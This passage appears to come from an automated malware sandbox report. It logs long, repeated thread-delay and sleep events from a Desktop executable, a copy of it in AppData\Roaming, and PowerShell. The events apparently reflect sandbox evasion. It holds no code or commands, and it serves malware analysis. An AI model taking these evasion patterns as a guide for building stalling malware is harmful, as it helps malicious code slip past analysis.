                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596343Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596109Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595890Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599859Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599734Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599616Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599516Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599406Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599297Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598703Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598583Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598016Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597904Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597250Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597138Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596922Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596688Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596563Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596313Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596203Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596094Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595969Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7347Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2298Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeWindow / User API: threadDelayed 1822Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeWindow / User API: threadDelayed 8031Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeWindow / User API: threadDelayed 2180Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeWindow / User API: threadDelayed 7659Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 6776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep count: 31 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 4156Thread sleep count: 1822 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 4156Thread sleep count: 8031 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -599328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -599219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -599103s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -598984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -598874s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -598765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -598656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -598547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -598437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -598312s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -598092s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -597969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -597813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -597699s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -597578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -597469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -597344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -597234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -597125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -597015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -596906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -596797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -596687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -596562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -596453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -596343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -596234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -596109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -596000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -595890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -595781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -595672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -595562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -595453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -595343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -595234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -595125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -595015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -594906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -594797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -594687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -594578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe TID: 5096Thread sleep time: -594469s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 4912Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep count: 37 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 3912Thread sleep count: 2180 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -599859s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 3912Thread sleep count: 7659 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -599734s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -599616s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -599516s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -599406s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -599297s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -599188s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -599063s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -598938s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -598813s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -598703s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -598583s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -598453s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -598125s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -598016s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -597904s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -597797s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -597687s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -597578s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -597468s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -597359s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -597250s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -597138s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -597031s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -596922s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -596813s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -596688s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -596563s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -596438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -596313s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -596203s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -596094s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595969s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe TID: 2796Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599103Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598984Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598874Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598765Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598547Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598437Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598092Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597969Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597699Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597344Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597015Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596343Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596109Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595890Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599859Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599734Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599616Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599516Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599406Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599297Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 599063Jump to behavior
